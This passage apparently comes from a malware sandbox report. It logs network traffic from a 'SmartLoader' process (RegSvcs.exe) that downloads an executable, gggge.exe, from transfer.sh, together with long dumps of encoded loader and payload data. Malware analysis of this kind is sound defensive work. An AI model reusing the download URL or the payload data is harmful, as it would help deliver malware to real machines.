{"loader":"YzIsNzksYzQsZTAsZGMsOTksYzYsY2EsZDcsZGIsYmEsYmQsYWQsOWIsYjgsYTYsYzUsOWIsOWYsODksNjcsYTEsODcsNGYsYjEsYzUsZTcsYzgsYjksYTUsZGMsNTksODEsNzcsOTMsOTMsOGMsNWEsYzUsYmMsZTQsZDgsY2EsYzUsYWIsOTUsNzYsN2IsNzMsZjQsODcsZGQsOWYsZTIsY2MsNGYsOGEsNzAsYTAsOGEsNzMsNTAsOTAsYWEsYmIsYjgsZDYsZGMsZGYsNWEsOGQsNzcsZGUsZDgsYzEsY2EsYWQsYWEsODAsNjEsNzUsZWQsYzYsY2IsYTIsZGEsZGIsNGYsOGEsNzAsZWUsN2IsYmIsOTUsZTYsYWIsNjksOTEsODIsODksYWQsYTYsNzMsYmMsZWEsZTksYzQsYzksNjgsOWMsYjcsYTQsYzgsZWIsZDcsY2UsOWEsOTcsOTMsNGQsNzIsYzMsZTcsYmEsYmIsYTUsZTEsNTksODEsNzcsYzgsYzgsZDgsYWIsYjgsZDQsZjUs","tasks":"YTIsZDIsODQsZDAsZDAsNWEsOGQsNzcsYWQsYTgsODksODMsNjgsNGYsYzAsYWEsYzEsZTQsODcsYTMsNTYsOTcsY2YsYTEsYzQsYzAsZTYsOT
Mar 24, 2023 07:58:00.624969959 CET	112	IN	Data Raw: 4d 73 4e 7a 59 73 4e 57 59 73 5a 54 49 73 59 54 6b 73 59 54 67 73 59 7a 55 73 5a 44 55 73 59 32 51 73 5a 44 45 73 59 57 45 73 4f 44 45 73 59 32 45 73 5a 54 41 73 59 54 59 73 59 6d 4d 73 59 6d 4d 73 59 6d 4d 73 4e 57 4d 73 59 32 51 73 4f 44 49 73 Data Ascii: MsNzYsNWYsZTIsYTksYTgsYzUsZDUsY2QsZDEsYWEsODEsY2EsZTAsYTYsYmMsYmMsYmMsNWMsY2QsODIsOTgsYzksZDUsZDUsNjUsZGMsY2UsOTQsYjcsYjUsYTEsYmUsYmYsOTUsOTAsNjMsNjcsNzksYzgsZDAsZDgsOWQsYjIsYzcsZDksZWIsYmQsNzksODIsNGQsNzYsOTUsYjgsZTYsZDUsOGIsNjIsOTUsODksOTMsY

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49713	144.76.136.153	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
Mar 24, 2023 07:58:00.729454041 CET	117	OUT	GET /get/yAEPpl/gggge.exe HTTP/1.1 Content-Type: application/json User-Agent: SmartLoader Host: transfer.sh
Mar 24, 2023 07:58:00.752856016 CET	118	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Fri, 24 Mar 2023 06:58:00 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://transfer.sh/get/yAEPpl/gggge.exe Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49714	144.76.136.153	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-24 06:58:01 UTC	0	OUT	GET /get/yAEPpl/gggge.exe HTTP/1.1 User-Agent: SmartLoader Host: transfer.sh Connection: Keep-Alive
2023-03-24 06:58:02 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 24 Mar 2023 06:58:02 GMT Content-Type: application/x-ms-dos-executable Content-Length: 1761013 Connection: close Cache-Control: no-store Content-Disposition: attachment; filename="gggge.exe" Retry-After: Fri, 24 Mar 2023 07:58:06 GMT X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,84.17.52.40,84.17.52.40 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1679641086 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Strict-Transport-Security: max-age=63072000
2023-03-24 06:58:02 UTC	0	IN	Data Raw: 39 34 2c 62 31 2c 66 32 2c 36 37 2c 36 66 2c 33 38 2c 35 33 2c 35 37 2c 37 63 2c 37 37 2c 35 35 2c 35 37 2c 31 34 37 2c 31 32 63 2c 35 34 2c 34 31 2c 31 30 62 2c 37 39 2c 36 35 2c 36 39 2c 33 36 2c 37 35 2c 36 37 2c 32 64 2c 39 30 2c 35 30 2c 37 33 2c 35 39 2c 34 37 2c 33 30 2c 36 65 2c 33 37 2c 34 37 2c 35 37 2c 36 32 2c 36 37 2c 36 63 2c 33 38 2c 35 33 2c 35 37 2c 37 38 2c 37 37 2c 35 35 2c 35 37 2c 34 38 2c 32 64 2c 35 34 2c 34 31 2c 35 33 2c 37 39 2c 36 35 2c 36 39 2c 33 36 2c 37 35 2c 36 37 2c 32 64 2c 35 30 2c 35 30 2c 37 33 2c 35 39 2c 63 37 2c 33 30 2c 36 65 2c 33 37 2c 35 35 2c 37 36 2c 31 31 63 2c 37 35 2c 36 63 2c 65 63 2c 35 63 2c 31 32 34 2c 39 39 2c 31 32 66 2c 35 36 2c 61 33 2c 31 31 35 2c 34 65 2c 61 38 2c 61 39 2c 62 63 2c 65 63 2c 38 35 Data Ascii: 94,b1,f2,67,6f,38,53,57,7c,77,55,57,147,12c,54,41,10b,79,65,69,36,75,67,2d,90,50,73,59,47,30,6e,37,47,57,62,67,6c,38,53,57,78,77,55,57,48,2d,54,41,53,79,65,69,36,75,67,2d,50,50,73,59,c7,30,6e,37,55,76,11c,75,6c,ec,5c,124,99,12f,56,a3,115,4e,a8,a9,bc,ec,85
2023-03-24 06:58:02 UTC	16	IN	Data Raw: 34 2c 37 38 2c 31 32 30 2c 31 30 33 2c 62 35 2c 35 37 2c 31 33 66 2c 34 36 2c 37 61 2c 31 31 37 2c 31 30 36 2c 36 65 2c 63 37 2c 63 35 2c 62 66 2c 65 35 2c 31 34 31 2c 38 64 2c 37 33 2c 35 39 2c 66 66 2c 31 31 32 2c 38 61 2c 33 37 2c 34 37 2c 31 30 66 2c 31 30 32 2c 37 39 2c 36 63 2c 33 38 2c 61 33 2c 31 30 66 2c 31 33 33 2c 37 61 2c 35 35 2c 35 37 2c 31 30 30 2c 36 34 2c 37 63 2c 34 31 2c 35 33 2c 64 31 2c 62 36 2c 31 32 32 2c 61 63 2c 65 34 2c 36 37 2c 32 64 2c 61 39 2c 31 30 38 2c 63 61 2c 61 64 2c 34 37 2c 33 30 2c 63 36 2c 38 64 2c 31 33 32 2c 36 36 2c 38 63 2c 61 30 2c 31 33 61 2c 65 38 2c 61 61 2c 65 65 2c 61 39 2c 66 31 2c 31 33 34 2c 63 31 2c 66 65 2c 62 66 2c 36 62 2c 66 36 2c 31 30 30 2c 31 30 39 2c 31 35 30 2c 37 38 2c 31 33 34 2c 31 36 36 2c Data Ascii: 4,78,120,103,b5,57,13f,46,7a,117,106,6e,c7,c5,bf,e5,141,8d,73,59,ff,112,8a,37,47,10f,102,79,6c,38,a3,10f,133,7a,55,57,100,64,7c,41,53,d1,b6,122,ac,e4,67,2d,a9,108,ca,ad,47,30,c6,8d,132,66,8c,a0,13a,e8,aa,ee,a9,f1,134,c1,fe,bf,6b,f6,100,109,150,78,134,166,
2023-03-24 06:58:02 UTC	32	IN	Data Raw: 2c 31 31 65 2c 31 32 65 2c 64 61 2c 31 34 30 2c 66 66 2c 31 32 65 2c 31 37 34 2c 65 31 2c 64 36 2c 34 37 2c 31 32 31 2c 61 62 2c 36 34 2c 37 38 2c 65 33 2c 63 36 2c 37 35 2c 38 35 2c 39 38 2c 66 64 2c 63 37 2c 66 66 2c 35 62 2c 36 39 2c 36 37 2c 36 63 2c 38 61 2c 31 30 64 2c 31 30 61 2c 38 33 2c 37 37 2c 35 35 2c 62 31 2c 31 30 30 2c 39 61 2c 61 31 2c 34 31 2c 35 33 2c 64 31 2c 62 35 2c 66 39 2c 65 65 2c 31 34 37 2c 62 36 2c 32 64 2c 35 30 2c 61 38 2c 63 35 2c 31 31 33 2c 31 32 64 2c 37 63 2c 36 65 2c 33 37 2c 31 30 31 2c 65 65 2c 62 34 2c 36 37 2c 36 63 2c 38 61 2c 61 34 2c 31 31 30 2c 31 35 61 2c 62 37 2c 35 35 2c 35 37 2c 31 30 31 2c 33 34 2c 36 38 2c 34 31 2c 35 33 2c 31 33 32 2c 66 37 2c 61 64 2c 33 36 2c 37 35 2c 31 32 30 2c 62 36 2c 38 32 2c 35 30 Data Ascii: ,11e,12e,da,140,ff,12e,174,e1,d6,47,121,ab,64,78,e3,c6,75,85,98,fd,c7,ff,5b,69,67,6c,8a,10d,10a,83,77,55,b1,100,9a,a1,41,53,d1,b5,f9,ee,147,b6,2d,50,a8,c5,113,12d,7c,6e,37,101,ee,b4,67,6c,8a,a4,110,15a,b7,55,57,101,34,68,41,53,132,f7,ad,36,75,120,b6,82,50
2023-03-24 06:58:02 UTC	48	IN	Data Raw: 63 61 2c 31 31 62 2c 66 61 2c 31 31 33 2c 66 62 2c 37 39 2c 66 31 2c 62 31 2c 38 64 2c 39 39 2c 31 31 31 2c 36 39 2c 61 65 2c 36 63 2c 33 38 2c 31 33 65 2c 37 30 2c 31 36 30 2c 37 39 2c 64 62 2c 31 30 62 2c 38 66 2c 31 31 30 2c 63 36 2c 31 30 36 2c 31 33 62 2c 31 34 64 2c 31 30 61 2c 31 31 64 2c 37 65 2c 31 30 65 2c 38 65 2c 38 63 2c 35 64 2c 63 31 2c 31 30 61 2c 65 33 2c 31 33 34 2c 33 63 2c 66 64 2c 39 66 2c 35 32 2c 61 37 2c 31 31 61 2c 31 35 32 2c 37 38 2c 33 38 2c 35 33 2c 61 66 2c 64 32 2c 63 38 2c 31 30 65 2c 66 30 2c 39 36 2c 32 64 2c 35 34 2c 39 61 2c 61 33 2c 31 33 31 2c 66 63 2c 38 30 2c 33 36 2c 37 35 2c 31 35 32 2c 33 63 2c 31 30 63 2c 31 31 65 2c 62 64 2c 38 62 2c 31 30 63 2c 66 37 2c 31 33 62 2c 38 33 2c 65 34 2c 63 64 2c 36 63 2c 65 63 2c Data Ascii: ca,11b,fa,113,fb,79,f1,b1,8d,99,111,69,ae,6c,38,13e,70,160,79,db,10b,8f,110,c6,106,13b,14d,10a,11d,7e,10e,8e,8c,5d,c1,10a,e3,134,3c,fd,9f,52,a7,11a,152,78,38,53,af,d2,c8,10e,f0,96,2d,54,9a,a3,131,fc,80,36,75,152,3c,10c,11e,bd,8b,10c,f7,13b,83,e4,cd,6c,ec,
2023-03-24 06:58:02 UTC	64	IN	Data Raw: 32 35 2c 63 36 2c 31 32 33 2c 36 32 2c 39 33 2c 31 36 63 2c 65 39 2c 31 32 65 2c 31 31 65 2c 62 62 2c 39 30 2c 36 65 2c 35 39 2c 31 32 36 2c 31 35 37 2c 31 34 38 2c 65 37 2c 64 39 2c 31 36 32 2c 62 37 2c 38 35 2c 31 33 62 2c 35 66 2c 39 37 2c 61 66 2c 39 31 2c 35 31 2c 31 33 64 2c 61 32 2c 31 31 39 2c 31 30 35 2c 65 36 2c 31 30 61 2c 38 39 2c 37 63 2c 66 30 2c 38 38 2c 31 32 64 2c 63 37 2c 31 30 64 2c 31 30 39 2c 62 61 2c 32 64 2c 35 34 2c 66 39 2c 61 30 2c 63 39 2c 36 35 2c 36 39 2c 38 65 2c 31 36 30 2c 37 36 2c 62 30 2c 62 65 2c 36 62 2c 63 35 2c 65 33 2c 31 33 37 2c 36 33 2c 65 37 2c 39 62 2c 63 36 2c 31 35 33 2c 61 64 2c 31 35 65 2c 62 63 2c 38 66 2c 31 33 65 2c 35 63 2c 31 33 63 2c 38 36 2c 37 61 2c 31 31 62 2c 31 30 33 2c 37 65 2c 31 30 64 2c 31 31 Data Ascii: 25,c6,123,62,93,16c,e9,12e,11e,bb,90,6e,59,126,157,148,e7,d9,162,b7,85,13b,5f,97,af,91,51,13d,a2,119,105,e6,10a,89,7c,f0,88,12d,c7,10d,109,ba,2d,54,f9,a0,c9,65,69,8e,160,76,b0,be,6b,c5,e3,137,63,e7,9b,c6,153,ad,15e,bc,8f,13e,5c,13c,86,7a,11b,103,7e,10d,11
2023-03-24 06:58:02 UTC	80	IN	Data Raw: 2c 62 30 2c 64 61 2c 65 38 2c 35 66 2c 61 32 2c 38 35 2c 63 61 2c 31 33 62 2c 36 39 2c 31 34 38 2c 38 63 2c 31 30 32 2c 63 33 2c 31 36 32 2c 31 33 30 2c 65 36 2c 37 31 2c 39 30 2c 31 31 32 2c 31 33 38 2c 62 65 2c 63 35 2c 31 33 34 2c 62 36 2c 31 35 31 2c 31 30 62 2c 31 34 38 2c 66 35 2c 36 38 2c 37 36 2c 66 38 2c 61 62 2c 31 30 63 2c 31 33 32 2c 62 62 2c 39 30 2c 63 35 2c 31 35 32 2c 33 32 2c 31 30 31 2c 63 31 2c 31 36 34 2c 31 34 61 2c 39 38 2c 31 31 62 2c 37 64 2c 65 35 2c 62 64 2c 31 32 37 2c 31 35 32 2c 31 34 31 2c 37 65 2c 35 64 2c 35 66 2c 63 32 2c 31 36 32 2c 38 65 2c 31 31 64 2c 31 33 31 2c 65 38 2c 34 66 2c 61 34 2c 31 32 63 2c 36 63 2c 38 39 2c 38 36 2c 31 36 32 2c 39 64 2c 31 36 35 2c 64 38 2c 36 63 2c 31 33 61 2c 38 33 2c 66 32 2c 31 32 61 2c Data Ascii: ,b0,da,e8,5f,a2,85,ca,13b,69,148,8c,102,c3,162,130,e6,71,90,112,138,be,c5,134,b6,151,10b,148,f5,68,76,f8,ab,10c,132,bb,90,c5,152,32,101,c1,164,14a,98,11b,7d,e5,bd,127,152,141,7e,5d,5f,c2,162,8e,11d,131,e8,4f,a4,12c,6c,89,86,162,9d,165,d8,6c,13a,83,f2,12a,
2023-03-24 06:58:02 UTC	96	IN	Data Raw: 33 35 2c 38 62 2c 38 33 2c 31 32 61 2c 31 34 63 2c 31 32 34 2c 62 38 2c 31 32 35 2c 66 33 2c 36 34 2c 35 37 2c 37 38 2c 64 30 2c 31 34 30 2c 36 36 2c 31 33 38 2c 33 64 2c 64 35 2c 39 62 2c 37 61 2c 62 62 2c 37 63 2c 37 36 2c 35 31 2c 31 34 65 2c 31 31 34 2c 31 30 36 2c 39 65 2c 31 31 63 2c 61 35 2c 61 61 2c 31 30 30 2c 39 36 2c 62 62 2c 33 37 2c 34 37 2c 62 30 2c 31 34 64 2c 37 36 2c 63 31 2c 66 62 2c 31 34 66 2c 65 62 2c 64 65 2c 38 61 2c 64 39 2c 61 66 2c 36 65 2c 36 38 2c 66 64 2c 66 62 2c 36 65 2c 66 30 2c 31 35 34 2c 62 39 2c 38 65 2c 63 35 2c 31 31 66 2c 39 37 2c 36 61 2c 35 30 2c 37 33 2c 31 31 31 2c 31 31 61 2c 61 65 2c 36 65 2c 33 37 2c 31 33 32 2c 37 30 2c 65 35 2c 64 38 2c 64 34 2c 34 31 2c 39 66 2c 64 39 2c 61 64 2c 65 66 2c 31 30 65 2c 62 65 Data Ascii: 35,8b,83,12a,14c,124,b8,125,f3,64,57,78,d0,140,66,138,3d,d5,9b,7a,bb,7c,76,51,14e,114,106,9e,11c,a5,aa,100,96,bb,37,47,b0,14d,76,c1,fb,14f,eb,de,8a,d9,af,6e,68,fd,fb,6e,f0,154,b9,8e,c5,11f,97,6a,50,73,111,11a,ae,6e,37,132,70,e5,d8,d4,41,9f,d9,ad,ef,10e,be
2023-03-24 06:58:02 UTC	112	IN	Data Raw: 2c 31 30 34 2c 64 62 2c 66 39 2c 38 33 2c 31 31 30 2c 31 35 30 2c 31 35 39 2c 62 30 2c 37 35 2c 35 62 2c 31 32 65 2c 61 36 2c 31 36 32 2c 35 61 2c 39 35 2c 65 63 2c 65 63 2c 31 34 38 2c 35 31 2c 31 33 65 2c 37 65 2c 63 34 2c 62 36 2c 31 30 36 2c 65 31 2c 39 30 2c 37 64 2c 61 38 2c 31 33 62 2c 38 32 2c 35 61 2c 36 63 2c 31 30 62 2c 31 32 62 2c 38 32 2c 31 31 66 2c 63 63 2c 38 33 2c 37 66 2c 37 34 2c 31 30 64 2c 39 32 2c 38 66 2c 31 33 64 2c 65 61 2c 61 35 2c 61 66 2c 39 39 2c 38 36 2c 31 33 66 2c 34 36 2c 39 63 2c 38 32 2c 31 35 36 2c 37 38 2c 37 30 2c 63 35 2c 31 31 66 2c 36 38 2c 35 62 2c 35 30 2c 37 33 2c 62 31 2c 31 33 32 2c 33 35 2c 31 33 65 2c 37 31 2c 39 64 2c 38 37 2c 31 33 61 2c 63 30 2c 31 35 37 2c 34 37 2c 66 64 2c 63 31 2c 65 65 2c 39 39 2c 39 Data Ascii: ,104,db,f9,83,110,150,159,b0,75,5b,12e,a6,162,5a,95,ec,ec,148,51,13e,7e,c4,b6,106,e1,90,7d,a8,13b,82,5a,6c,10b,12b,82,11f,cc,83,7f,74,10d,92,8f,13d,ea,a5,af,99,86,13f,46,9c,82,156,78,70,c5,11f,68,5b,50,73,b1,132,35,13e,71,9d,87,13a,c0,157,47,fd,c1,ee,99,9
2023-03-24 06:58:02 UTC	128	IN	Data Raw: 61 30 2c 35 33 2c 37 39 2c 31 35 30 2c 37 38 2c 31 31 61 2c 64 63 2c 37 32 2c 66 36 2c 63 66 2c 63 35 2c 31 34 34 2c 37 36 2c 31 32 34 2c 39 31 2c 31 32 61 2c 38 64 2c 31 33 65 2c 62 32 2c 64 39 2c 63 30 2c 62 63 2c 31 32 33 2c 36 63 2c 36 65 2c 31 35 65 2c 38 66 2c 65 65 2c 36 34 2c 65 38 2c 39 62 2c 37 36 2c 62 32 2c 31 30 30 2c 31 37 33 2c 39 63 2c 63 37 2c 31 32 66 2c 61 61 2c 31 31 61 2c 63 32 2c 31 33 65 2c 37 35 2c 62 31 2c 31 34 30 2c 62 66 2c 65 36 2c 64 39 2c 38 35 2c 31 33 32 2c 36 36 2c 36 33 2c 39 61 2c 36 63 2c 61 64 2c 64 66 2c 37 36 2c 62 61 2c 31 34 39 2c 62 61 2c 64 31 2c 35 31 2c 31 30 66 2c 35 62 2c 31 31 61 2c 31 32 32 2c 63 61 2c 31 31 65 2c 31 33 32 2c 34 35 2c 37 35 2c 36 37 2c 37 64 2c 31 30 38 2c 31 31 32 2c 38 62 2c 35 39 2c 34 Data Ascii: a0,53,79,150,78,11a,dc,72,f6,cf,c5,144,76,124,91,12a,8d,13e,b2,d9,c0,bc,123,6c,6e,15e,8f,ee,64,e8,9b,76,b2,100,173,9c,c7,12f,aa,11a,c2,13e,75,b1,140,bf,e6,d9,85,132,66,63,9a,6c,ad,df,76,ba,149,ba,d1,51,10f,5b,11a,122,ca,11e,132,45,75,67,7d,108,112,8b,59,4
2023-03-24 06:58:02 UTC	144	IN	Data Raw: 34 2c 39 34 2c 37 39 2c 35 37 2c 37 38 2c 63 66 2c 65 35 2c 31 31 30 2c 37 64 2c 37 30 2c 35 34 2c 34 31 2c 61 63 2c 31 30 32 2c 61 39 2c 38 64 2c 33 65 2c 63 35 2c 62 66 2c 66 34 2c 35 34 2c 37 34 2c 62 33 2c 35 39 2c 38 38 2c 33 30 2c 31 35 39 2c 34 36 2c 31 34 34 2c 62 62 2c 65 39 2c 64 66 2c 65 63 2c 31 31 39 2c 31 34 36 2c 39 33 2c 31 33 35 2c 64 66 2c 37 38 2c 31 32 64 2c 66 37 2c 62 37 2c 31 33 66 2c 39 33 2c 61 64 2c 31 36 31 2c 63 66 2c 63 32 2c 31 33 35 2c 31 37 34 2c 62 37 2c 37 66 2c 61 61 2c 31 30 38 2c 61 37 2c 38 31 2c 34 37 2c 33 30 2c 62 66 2c 66 30 2c 31 34 31 2c 39 38 2c 36 32 2c 36 37 2c 31 35 37 2c 34 37 2c 31 30 36 2c 39 32 2c 66 30 2c 38 65 2c 36 35 2c 66 38 2c 65 63 2c 33 61 2c 31 31 39 2c 37 37 2c 31 31 30 2c 31 36 62 2c 63 65 2c Data Ascii: 4,94,79,57,78,cf,e5,110,7d,70,54,41,ac,102,a9,8d,3e,c5,bf,f4,54,74,b3,59,88,30,159,46,144,bb,e9,df,ec,119,146,93,135,df,78,12d,f7,b7,13f,93,ad,161,cf,c2,135,174,b7,7f,aa,108,a7,81,47,30,bf,f0,141,98,62,67,157,47,106,92,f0,8e,65,f8,ec,3a,119,77,110,16b,ce,
2023-03-24 06:58:02 UTC	160	IN	Data Raw: 39 2c 61 66 2c 64 66 2c 37 30 2c 31 30 61 2c 66 65 2c 31 36 37 2c 31 32 61 2c 66 37 2c 66 39 2c 61 65 2c 31 31 65 2c 35 62 2c 35 32 2c 37 64 2c 63 38 2c 66 63 2c 39 32 2c 38 37 2c 63 65 2c 62 37 2c 38 35 2c 61 38 2c 61 61 2c 31 35 65 2c 36 38 2c 37 38 2c 64 62 2c 31 36 35 2c 33 37 2c 38 39 2c 61 63 2c 65 34 2c 31 34 33 2c 31 35 32 2c 31 31 31 2c 38 31 2c 66 39 2c 61 37 2c 31 36 31 2c 37 31 2c 31 30 66 2c 64 34 2c 34 36 2c 35 34 2c 34 31 2c 31 30 62 2c 31 37 35 2c 39 38 2c 36 39 2c 33 36 2c 63 37 2c 31 35 32 2c 33 63 2c 64 35 2c 63 33 2c 62 61 2c 62 34 2c 31 30 30 2c 39 62 2c 31 34 66 2c 38 37 2c 35 36 2c 62 37 2c 39 64 2c 31 34 66 2c 64 33 2c 37 39 2c 38 32 2c 31 34 32 2c 39 31 2c 37 39 2c 31 30 64 2c 37 64 2c 64 35 2c 35 64 2c 39 38 2c 64 39 2c 31 34 32 Data Ascii: 9,af,df,70,10a,fe,167,12a,f7,f9,ae,11e,5b,52,7d,c8,fc,92,87,ce,b7,85,a8,aa,15e,68,78,db,165,37,89,ac,e4,143,152,111,81,f9,a7,161,71,10f,d4,46,54,41,10b,175,98,69,36,c7,152,3c,d5,c3,ba,b4,100,9b,14f,87,56,b7,9d,14f,d3,79,82,142,91,79,10d,7d,d5,5d,98,d9,142
2023-03-24 06:58:02 UTC	176	IN	Data Raw: 2c 38 32 2c 31 33 61 2c 31 33 31 2c 62 30 2c 62 65 2c 31 33 30 2c 66 33 2c 65 61 2c 38 34 2c 31 31 62 2c 31 32 31 2c 31 33 35 2c 32 64 2c 35 39 2c 31 32 63 2c 36 32 2c 66 64 2c 63 31 2c 31 35 39 2c 33 63 2c 31 36 61 2c 64 39 2c 36 63 2c 38 65 2c 35 30 2c 31 36 35 2c 62 37 2c 63 33 2c 38 33 2c 31 32 39 2c 39 38 2c 31 33 32 2c 36 36 2c 38 64 2c 31 35 30 2c 38 63 2c 31 30 62 2c 36 30 2c 64 39 2c 38 37 2c 31 34 66 2c 35 66 2c 63 37 2c 66 39 2c 65 32 2c 62 30 2c 65 62 2c 36 34 2c 63 61 2c 31 31 65 2c 31 34 33 2c 33 66 2c 37 35 2c 36 37 2c 65 36 2c 65 39 2c 38 61 2c 37 33 2c 35 39 2c 31 30 30 2c 38 66 2c 61 31 2c 33 37 2c 34 37 2c 31 31 30 2c 31 35 64 2c 63 35 2c 36 63 2c 33 38 2c 61 63 2c 31 34 32 2c 39 31 2c 37 62 2c 31 34 64 2c 62 66 2c 31 34 36 2c 31 30 33 Data Ascii: ,82,13a,131,b0,be,130,f3,ea,84,11b,121,135,2d,59,12c,62,fd,c1,159,3c,16a,d9,6c,8e,50,165,b7,c3,83,129,98,132,66,8d,150,8c,10b,60,d9,87,14f,5f,c7,f9,e2,b0,eb,64,ca,11e,143,3f,75,67,e6,e9,8a,73,59,100,8f,a1,37,47,110,15d,c5,6c,38,ac,142,91,7b,14d,bf,146,103
2023-03-24 06:58:02 UTC	192	IN	Data Raw: 34 2c 61 32 2c 31 31 65 2c 64 30 2c 31 31 36 2c 37 33 2c 31 34 33 2c 65 63 2c 31 30 31 2c 31 30 35 2c 31 33 33 2c 37 39 2c 63 39 2c 36 33 2c 61 35 2c 31 31 37 2c 61 62 2c 65 63 2c 66 66 2c 31 32 63 2c 61 35 2c 31 33 38 2c 31 31 32 2c 31 34 32 2c 38 66 2c 38 64 2c 65 62 2c 31 30 32 2c 38 30 2c 31 32 63 2c 31 31 62 2c 63 32 2c 34 33 2c 31 31 62 2c 39 32 2c 64 37 2c 62 38 2c 31 33 64 2c 31 35 36 2c 64 38 2c 37 63 2c 61 65 2c 31 31 31 2c 66 34 2c 31 32 33 2c 31 35 31 2c 37 61 2c 31 35 65 2c 31 35 39 2c 35 33 2c 31 30 65 2c 62 66 2c 62 63 2c 31 36 66 2c 31 30 33 2c 36 39 2c 31 30 35 2c 31 32 30 2c 37 38 2c 31 30 35 2c 64 31 2c 38 34 2c 38 36 2c 38 61 2c 31 32 39 2c 63 63 2c 31 31 37 2c 34 32 2c 36 62 2c 66 35 2c 37 34 2c 36 64 2c 36 31 2c 39 35 2c 61 64 2c 34 Data Ascii: 4,a2,11e,d0,116,73,143,ec,101,105,133,79,c9,63,a5,117,ab,ec,ff,12c,a5,138,112,142,8f,8d,eb,102,80,12c,11b,c2,43,11b,92,d7,b8,13d,156,d8,7c,ae,111,f4,123,151,7a,15e,159,53,10e,bf,bc,16f,103,69,105,120,78,105,d1,84,86,8a,129,cc,117,42,6b,f5,74,6d,61,95,ad,4
2023-03-24 06:58:02 UTC	208	IN	Data Raw: 64 2c 64 39 2c 31 33 63 2c 63 66 2c 65 63 2c 31 31 62 2c 37 61 2c 31 34 37 2c 66 38 2c 61 63 2c 31 30 63 2c 34 34 2c 66 37 2c 36 35 2c 38 65 2c 31 31 33 2c 31 31 30 2c 66 62 2c 37 34 2c 31 31 31 2c 31 31 64 2c 31 30 63 2c 63 39 2c 62 38 2c 31 33 33 2c 38 39 2c 31 32 36 2c 31 31 33 2c 31 31 35 2c 39 62 2c 34 66 2c 66 30 2c 31 34 63 2c 62 66 2c 63 35 2c 33 65 2c 62 32 2c 31 34 30 2c 64 33 2c 31 37 32 2c 66 35 2c 37 32 2c 66 66 2c 31 31 65 2c 31 33 62 2c 34 36 2c 62 63 2c 31 36 30 2c 63 31 2c 31 35 31 2c 31 32 35 2c 31 37 34 2c 31 36 30 2c 35 32 2c 62 34 2c 62 65 2c 31 34 65 2c 31 30 61 2c 38 64 2c 37 63 2c 31 35 35 2c 31 32 32 2c 63 31 2c 62 30 2c 65 38 2c 64 34 2c 64 34 2c 63 65 2c 31 34 38 2c 61 36 2c 31 33 66 2c 61 39 2c 35 62 2c 65 35 2c 66 65 2c 31 30 Data Ascii: d,d9,13c,cf,ec,11b,7a,147,f8,ac,10c,44,f7,65,8e,113,110,fb,74,111,11d,10c,c9,b8,133,89,126,113,115,9b,4f,f0,14c,bf,c5,3e,b2,140,d3,172,f5,72,ff,11e,13b,46,bc,160,c1,151,125,174,160,52,b4,be,14e,10a,8d,7c,155,122,c1,b0,e8,d4,d4,ce,148,a6,13f,a9,5b,e5,fe,10
2023-03-24 06:58:02 UTC	224	IN	Data Raw: 31 35 33 2c 63 33 2c 65 63 2c 31 30 37 2c 37 61 2c 36 64 2c 31 32 39 2c 38 34 2c 31 32 32 2c 64 39 2c 34 37 2c 31 34 39 2c 65 64 2c 31 31 65 2c 39 64 2c 66 36 2c 31 32 61 2c 66 63 2c 64 34 2c 66 39 2c 35 35 2c 63 63 2c 39 66 2c 31 30 30 2c 37 38 2c 63 30 2c 31 32 62 2c 65 66 2c 65 65 2c 31 31 38 2c 36 33 2c 65 66 2c 31 32 30 2c 34 39 2c 62 35 2c 31 34 31 2c 61 66 2c 61 39 2c 31 32 34 2c 31 30 38 2c 31 30 34 2c 31 30 63 2c 65 39 2c 31 32 65 2c 31 30 34 2c 38 33 2c 31 30 62 2c 37 63 2c 31 33 38 2c 66 37 2c 31 36 66 2c 31 30 38 2c 31 31 34 2c 62 31 2c 63 36 2c 38 64 2c 38 39 2c 62 63 2c 63 36 2c 64 30 2c 36 39 2c 64 61 2c 31 30 37 2c 31 37 34 2c 38 36 2c 62 63 2c 31 32 32 2c 63 33 2c 31 30 31 2c 36 32 2c 31 33 62 2c 31 32 63 2c 31 36 64 2c 63 36 2c 37 63 2c Data Ascii: 153,c3,ec,107,7a,6d,129,84,122,d9,47,149,ed,11e,9d,f6,12a,fc,d4,f9,55,cc,9f,100,78,c0,12b,ef,ee,118,63,ef,120,49,b5,141,af,a9,124,108,104,10c,e9,12e,104,83,10b,7c,138,f7,16f,108,114,b1,c6,8d,89,bc,c6,d0,69,da,107,174,86,bc,122,c3,101,62,13b,12c,16d,c6,7c,
